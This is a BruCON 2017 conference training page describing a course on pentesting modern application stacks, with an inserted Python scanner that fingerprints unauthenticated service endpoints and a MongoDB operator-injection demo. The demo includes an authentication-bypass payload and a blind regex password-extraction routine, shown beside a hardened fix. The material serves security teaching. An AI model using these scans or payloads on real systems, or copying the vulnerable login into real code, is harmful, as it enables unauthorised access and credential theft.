Training 2017 - Pentesting the Modern Application Stack

From BruCON 2017

Latest revision as of 15:06, 6 June 2017
Pentesting the Modern Application Stack

Pentesting the Modern Application Stack is a course that covers red team tactics for pentesting the modern application stack. Attendees will learn to identify, exploit and exfiltrate data from database servers, software collaboration tools, CI tools, distributed configuration and resource management tools, containers, big data environments, search technologies and message brokers. The two-day course is a fast-paced, fully hands-on programme that aims to impart the methodology and the tools of the trade for testing these systems. Real-world corporate stacks are emulated as containerised challenges to prepare students for the scenarios they will meet in practice.

Course Description

Continuous build and deployment tools, message brokers, configuration management systems, resource management systems and distributed file systems are among the most common systems deployed in modern cloud infrastructures, a consequence of the increasingly distributed nature of software. Modern pentesting is no longer limited to remote command execution through an exposed web application: each of these components opens another door into a company's infrastructure, and many of them expose unauthenticated management interfaces in their default configuration. A tester must be able to find and compromise these systems to gain a better foothold, as recent attacks on stack components discovered through platforms like Shodan have shown, paving the way to full compromise of corporate infrastructure.

In this two-day course we start with red team tactics for pentesting a modern application stack consisting of databases, CI tools, distributed configuration and resource management tools, containers, big data environments, search technologies and message brokers.
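The description above makes the point that these components are found and attacked directly, usually starting from a banner or a version endpoint. The script below is an added example written for this page, not material from the course: it fingerprints several of the stack components covered in the modules from the unauthenticated version and status endpoints each of them exposes. The endpoint paths, four-letter commands and JSON field names are the upstream ones; the default port numbers are assumptions, and every reply in SAMPLE_REPLIES is constructed (invented version strings in the real response shape).

```python
"""Fingerprint modern-stack components from the unauthenticated version/status
endpoints they expose.  Added example for this page, not course material.
Endpoint paths and wire commands are upstream; SAMPLE_REPLIES is constructed."""
import json
import re
import socket
import urllib.error
import urllib.request

def _json_path(*keys):
    """Extractor: walk a JSON body along `keys` and return the leaf as a string."""
    def extract(body, headers):
        try:
            obj = json.loads(body)
            for key in keys:
                obj = obj[key]
            return str(obj) if isinstance(obj, (str, int)) else None
        except (ValueError, KeyError, TypeError):
            return None
    return extract

def _regex(pattern):
    """Extractor: first capture group of `pattern` in a text reply."""
    def extract(body, headers):
        match = re.search(pattern, body)
        return match.group(1) if match else None
    return extract

def _redis(body, headers):
    # An open instance answers INFO; one with requirepass answers -NOAUTH.
    # Both confirm Redis, only the first leaks the version.
    if body.startswith("-NOAUTH"):
        return "auth-required"
    return _regex(r"redis_version:([\w.]+)")(body, headers)

# (service, default port, kind, request, extractor).  "http" probes GET the
# path; "tcp" probes send the raw bytes and read one reply.  Ports are assumed.
PROBES = [
    ("elasticsearch", 9200, "http", "/", _json_path("version", "number")),
    ("jenkins", 8080, "http", "/", lambda body, headers: headers.get("x-jenkins")),
    ("etcd", 2379, "http", "/version", _json_path("etcdserver")),
    ("kubernetes-apiserver", 8080, "http", "/version", _json_path("gitVersion")),
    ("consul", 8500, "http", "/v1/agent/self", _json_path("Config", "Version")),
    ("zookeeper", 2181, "tcp", b"srvr", _regex(r"Zookeeper version: ([\w.\-]+)")),
    ("redis", 6379, "tcp", b"INFO server\r\n", _redis),
    ("memcached", 11211, "tcp", b"version\r\n", _regex(r"^VERSION ([\w.\-]+)")),
]

def classify(kind, request, body, headers=None):
    """[(service, version)] for each probe matching `request` whose extractor
    recognises the reply; [] when nothing matches."""
    headers = {k.lower(): v for k, v in (headers or {}).items()}
    hits = []
    for service, _port, pkind, preq, extract in PROBES:
        if pkind == kind and preq == request:
            version = extract(body or "", headers)
            if version:
                hits.append((service, version))
    return hits

def probe(host, port, kind, request, timeout=3.0):
    """Live network probe; returns (body, headers), with body None on failure."""
    try:
        if kind == "tcp":
            with socket.create_connection((host, port), timeout=timeout) as sock:
                sock.sendall(request)
                chunks = []
                try:
                    while len(chunks) < 16 and (not chunks or chunks[-1]):
                        chunks.append(sock.recv(4096))
                except socket.timeout:  # Redis keeps the socket open after INFO
                    pass
                return b"".join(chunks).decode("utf-8", "replace"), {}
        req = urllib.request.Request("http://%s:%d%s" % (host, port, request))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "replace"), dict(resp.headers)
        except urllib.error.HTTPError as err:  # 401/403 replies still fingerprint
            return err.read().decode("utf-8", "replace"), dict(err.headers)
    except (OSError, ValueError):
        return None, {}

def scan(host):
    """Probe every entry of PROBES on `host`; returns {service: version}."""
    found = {}
    for _service, port, kind, request, _extract in PROBES:
        body, headers = probe(host, port, kind, request)
        if body is not None:
            found.update(classify(kind, request, body, headers))
    return found

# Constructed replies in the shape of each upstream API (version values invented).
SAMPLE_REPLIES = [
    ("http", "/", '{"name":"node-1","version":{"number":"1.4.2"},"tagline":"You Know, for Search"}', {}),
    ("http", "/", "<html>Authentication required</html>", {"X-Jenkins": "2.46.1"}),
    ("http", "/version", '{"etcdserver":"2.3.7","etcdcluster":"2.3.0"}', {}),
    ("http", "/version", '{"major":"1","minor":"6","gitVersion":"v1.6.4"}', {}),
    ("http", "/v1/agent/self", '{"Config":{"Datacenter":"dc1","Version":"0.8.3"}}', {}),
    ("tcp", b"srvr", "Zookeeper version: 3.4.6-1569965, built on 02/20/2014 09:09 GMT\n", {}),
    ("tcp", b"INFO server\r\n", "-NOAUTH Authentication required.\r\n", {}),
    ("tcp", b"version\r\n", "VERSION 1.4.25\r\n", {}),
]

def demo():
    """Classify the constructed replies; returns a list of (service, version)."""
    hits = []
    for kind, request, body, headers in SAMPLE_REPLIES:
        hits.extend(classify(kind, request, body, headers))
    return hits
```

`scan(host)` runs the live probes against a lab host; `classify()` works on captured replies, which is what `demo()` exercises. Two details matter in practice: a `-NOAUTH` reply from Redis is still a positive fingerprint even though the version stays hidden, and Jenkins sends its `X-Jenkins` header even on pages that answer 403, so the script treats HTTP error responses as data rather than failures.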

Course Contents

Along with the attack techniques themselves, the course aims to impart a methodology for testing these systems. It is meant for anyone who wants to understand, attack or secure the modern stack, and works through multiple challenging scenarios that most students will not have come across before.

During the course, students will learn to:

  • Find vulnerabilities within the application stack.
  • Pentest, in depth, a modern stack consisting of continuous build and deployment tools, message brokers, configuration management systems, resource management systems and distributed file systems.
  • Security-test an entire application stack from an end-to-end perspective.

Day 1

Module 0: Modern Application Stack

  • Evolution of Application Stack
  • Components of Stack
  • Threat Modelling
  • Attack Surface

Module 1: Pentesting Databases

  • MySQL, PostgreSQL and Oracle DB
    • Basic enumeration
    • Laying out the attack surface
    • Pentesting third-party plugins
    • Attacking database servers
    • Case study: CVE-2016-6663 (MySQL/MariaDB race-condition privilege escalation)
    • Security testing using the tools of the trade
  • Pentesting NoSQL databases and caches: MongoDB, Cassandra, Redis and Memcached
    • Fingerprinting NoSQL databases
    • Injection attacks on NoSQL databases
    • Attacking and identifying vulnerabilities in NoSQL databases with the NoSQL Exploitation Framework
    • Case study: the MongoDB ransomware campaign against unauthenticated, Internet-exposed instances, with hands-on vulnerable applications
  • Securing databases

Module 2: Public Cloud Environments

  • Introduction to cloud environments
  • AWS configuration and AWS security checks
  • Pentesting AWS Lambda functions
  • Security best practices for cloud environments and securing AWS instances

Module 3: CI Tools

  • Introduction to Jenkins, TeamCity and GoCD (ThoughtWorks Go)
  • Basic misconfigurations and attack surface of these tools
  • Security testing of CI tools and an outlook on vulnerabilities in Jenkins, TeamCity and GoCD
  • Case study: remote code execution on Jenkins

Module 4: Software Collaboration Tools

  • Leveraging version control systems such as Git, SVN and Perforce
  • Attacking code collaboration tools: Phabricator, GitLab and GitHub Enterprise

Module 5: Message Brokers

  • Introduction to RabbitMQ and Kafka
  • Common misconfigurations
  • Attacking message brokers and extracting sensitive information from them

Day 2

Module 6: Containers

  • Hacking Docker environments
  • Setting up static vulnerability analysis of Docker images (Clair and other tools)
  • Hacking Vagrant instances
  • Securing Docker and Vagrant instances

Module 7: Distributed Configuration Management Systems (DCMS)

  • Attacking Apache ZooKeeper, HashiCorp Consul and Serf, and CoreOS etcd
  • Owning the entire application through the DCMS and pivoting from it
  • Attacking and scanning with Garfield

Module 8: Distributed File System

  • Basic misconfigurations in Hadoop
  • Analysing the threat model for Hadoop
  • Attacks and remote code execution on Hadoop
  • Securing Hadoop instances

Module 9: Kubernetes, Mesos and Marathon (Distributed Deployment and Resource Management)

  • Introduction to Kubernetes, Mesos and Marathon
  • Fingerprinting Kubernetes, Mesos and Marathon
  • Common misconfigurations
  • Pentesting Kubernetes and pivoting through Kubernetes containers
  • Hacking the entire application stack through Mesos and Marathon
  • Securing Mesos instances

Module 10: Search Technologies

  • Introduction to Elasticsearch and Apache Solr (Lucene)
  • Laying out the attack surface and common misconfigurations
  • Pentesting Elasticsearch and Solr
  • Case study: Elasticsearch CVE-2015-1427 (Groovy scripting sandbox bypass leading to remote code execution)
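Module 1's "injection attacks on NoSQL databases" is worth seeing concretely. The script below is an added example written for this page rather than course material: it shows a MongoDB login filter built directly from a JSON request body, the operator injection that turns it into an authentication bypass and then into a blind password oracle, and the hardened variant beside it. So that it runs offline, `find()` is a deliberately tiny re-implementation of the subset of MongoDB query semantics the attack needs (equality, `$ne`, `$gt`, `$regex`) evaluated over a constructed in-memory user collection; against a real pymongo collection the same filter dicts go straight into `collection.find()`. Usernames, passwords and field names are all invented.

```python
"""MongoDB operator injection: a vulnerable login beside its hardened form.
Added example for this page, not course code.  `find()` is a toy matcher
covering only the operators the attack needs; USERS is constructed data."""
import json
import re

USERS = [  # constructed sample collection (plaintext passwords keep the demo short)
    {"username": "admin", "password": "s3cret!", "role": "admin"},
    {"username": "alice", "password": "hunter2", "role": "user"},
]

_OPERATORS = {
    "$ne": lambda stored, arg: stored != arg,
    "$gt": lambda stored, arg: stored is not None and stored > arg,
    "$regex": lambda stored, arg: isinstance(stored, str) and re.search(arg, stored) is not None,
}

def _matches(stored, condition):
    """Toy MongoDB semantics: a dict of operators, otherwise plain equality."""
    if isinstance(condition, dict):
        for op, arg in condition.items():
            if op not in _OPERATORS:
                raise ValueError("unsupported operator %s" % op)
            if not _OPERATORS[op](stored, arg):
                return False
        return True
    return stored == condition

def find(collection, query):
    """Return every document matching all fields of `query`."""
    return [doc for doc in collection
            if all(_matches(doc.get(field), cond) for field, cond in query.items())]

def login_vulnerable(body_json):
    """The bug: parsed JSON values go into the filter as-is, so the client
    decides whether they are strings or operator objects."""
    body = json.loads(body_json)
    query = {"username": body["username"], "password": body["password"]}
    return find(USERS, query)

def login_hardened(body_json):
    """The fix: enforce the expected scalar type before the value reaches the query."""
    body = json.loads(body_json)
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    return find(USERS, {"username": username, "password": password})

def bypass_payload():
    """{"$ne": ""} on both fields matches every user; the first row back is admin."""
    return json.dumps({"username": {"$ne": ""}, "password": {"$ne": ""}})

def leak_password(username, charset="abcdefghijklmnopqrstuvwxyz0123456789!", max_len=32):
    """Blind extraction through the vulnerable login: each request asks
    'does this user's password start with <prefix>?' via $regex."""
    prefix = ""
    for _ in range(max_len):
        for ch in charset:
            body = json.dumps({"username": username,
                               "password": {"$regex": "^" + re.escape(prefix + ch)}})
            if login_vulnerable(body):
                prefix += ch
                break
        else:
            break  # no character extends the prefix: the password is complete
    return prefix

if __name__ == "__main__":
    print("bypass  :", [u["username"] for u in login_vulnerable(bypass_payload())])
    print("leaked  :", leak_password("admin"))
    try:
        login_hardened(bypass_payload())
    except ValueError as err:
        print("hardened:", err)
```

The same bug is reachable through URL-encoded bodies as well: Express's default query-string parser turns `username[$ne]=x` into the object `{"$ne": "x"}`, so the type check in `login_hardened` (or rejecting any key that starts with `$`) is the control regardless of how the body was parsed. Hashing stored passwords closes the regex oracle too, because the value in the database is then no longer the secret being guessed.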

Labs: 10+ containerised labs that emulate a sophisticated production stack together with its applications.


Students will receive:

  • Presentation material and associated PDFs.
  • 10+ containerised labs that emulate sophisticated production application stacks.
  • Access to specific, relevant OpSecX courses and certifications.

Target audience

DevSecOps engineers, security engineers, penetration testers, bug bounty hunters, system administrators, SOC analysts, security enthusiasts and anyone interested in the modern application stack.

Requirements

Students should have:

  • Knowledge of basic pentesting, how web applications work, and Linux command-line basics.
  • The ability to use a web proxy such as Burp Suite or ZAP; the ability to write basic scripts in any interpreted language is an added advantage.

Hardware/software Requirements

The course requires a laptop with administrative and USB access, at least 8GB of RAM and 100GB of free disk space. Hardware virtualisation support (enabled in the firmware), VirtualBox and Docker should be installed and working before the class. A Unix-like system is preferred.

Trainer Biographies

Bharadwaj Machiraju is project leader for OWASP OWTF. He is mostly found either building a web appsec tool or hunting bugs for fame (hackerone.com/tunnelshade). All his tools are available at github.com/tunnelshade and all his ramblings at blog.tunnelshade.in. He has spoken at several conferences, notably PHDays, Nullcon, Troopers, BruCON and PyCon India. Apart from information security, he is interested in sleeping, mnemonic techniques and machine learning.

Twitter: @tunnelshade_ (https://twitter.com/tunnelshade_)

Francis Alexander works as a Security Engineer for Envestnet | Yodlee and spends his free time fuzzing or writing modules for the NoSQL Exploitation Framework, NoSQL Honeypot or Garfield. His areas of interest include NoSQL databases, machine learning and cloud security. He is overwhelmed and honoured to have spoken and trained at a variety of conferences such as PHDays, Troopers, Hack in the Box, Hack in Paris, 44Con, Nullcon and c0c0n.

Twitter: @torque59 (https://twitter.com/torque59)

Links:

  • Bharadwaj's HackerOne profile: https://hackerone.com/tunnelshade
  • Bharadwaj's GitHub: https://github.com/tunnelshade
  • Blog: http://blog.tunnelshade.in/

Mon. 2 - 3 October 2017 (09:00 - 17:00) (2-day) - Novotel Ghent Centrum
